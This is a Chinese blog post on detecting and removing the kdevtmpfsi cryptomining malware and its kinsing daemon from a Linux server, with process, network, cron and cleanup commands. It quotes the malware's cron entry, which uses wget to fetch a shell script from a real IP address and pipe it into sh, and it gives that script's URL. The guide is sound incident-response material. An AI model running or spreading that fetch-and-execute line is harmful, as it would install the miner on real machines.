kdevtmpfsi挖矿病毒以及他的守护进程kinsing 已完美解决 亲测

服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。

处理步骤如下:

kdevtmpfsi 进程处理:

1、# top

     查看cpu占用情况,找到占用cpu的进程     最后是  kdevtmpfsi

2、# netstat -natp 

     根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

有兴趣可以研究这个sh脚本  http://195.3.146.118/unk.sh

3、解决方法

kdevtmpfsi有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。

#查询关联的守护进程
[root@iZwz97v9b9ili0mz7rl188Z overlay2]# systemctl status 2854
● session-5649.scope - Session 5649 of user root
   Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled)
  Drop-In: /run/systemd/system/session-5649.scope.d
           └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
   Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago
   CGroup: /user.slice/user-0.slice/session-5649.scope
           ├─ 2854 /tmp/kdevtmpfsi
           └─18534 ./kinsing1oZIY4Aid7

 具体命令:

systemctl status 23437

ps -aux | grep kinsing

ps -aux | grep kdevtmpfsi

kill  -9   23437

kill  -9   18534

cd  /tmp

ls

 rm -rf kdevtmpfsi 

rm -rf /var/tmp/kinsing  记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令

find / -name kdevtmpfsi

find / -name kinsing

进入/var/spool/cron  查看是否有相关的木马定时任务在执行  有的话删掉再重启下crontab

 


 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值